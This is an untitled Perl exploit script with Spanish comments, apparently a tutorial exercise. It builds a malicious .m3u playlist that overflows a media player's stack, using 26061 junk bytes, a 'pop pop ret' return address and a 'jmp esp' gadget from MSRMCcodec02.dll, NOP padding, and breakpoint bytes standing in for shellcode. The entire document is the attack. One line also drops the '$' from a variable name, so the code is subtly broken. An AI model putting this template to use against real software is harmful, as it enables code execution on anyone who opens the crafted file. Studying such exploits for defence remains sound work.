Untitled


# C:\Documents and Settings\Adminitrador\Escritorio\

my $file= "pop-ret.m3u";
my $junk= "A" x 26061;
my $eip = pack('V',0x01BD1111); # "pop pop ret" from MSRMCcodec02.dll
my $jmpesp = pack('V',0x01D8F23A); # "jmp esp" from MSRMCcodec02.dll
my $prependesp = "XXXX"; # add 4 bytes so ESP points at beginning of shellcode bytes
my $shellcode = "\x90" x 8; # add more bytes (Queremos poner basura a todo antes de llegar a sustituir al RET ADDRESS que hemos ejecutado, el cual llevará el JMP ESP que pondremos ahora)
$shellcode = $shellcode . jmpesp; # address to return via pop pop ret ( = jmp esp)
$shellcode = $shellcode . "\xCC" x 50; # real shellcode

open($FILE,">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "Archivo m3u creado con exito\n";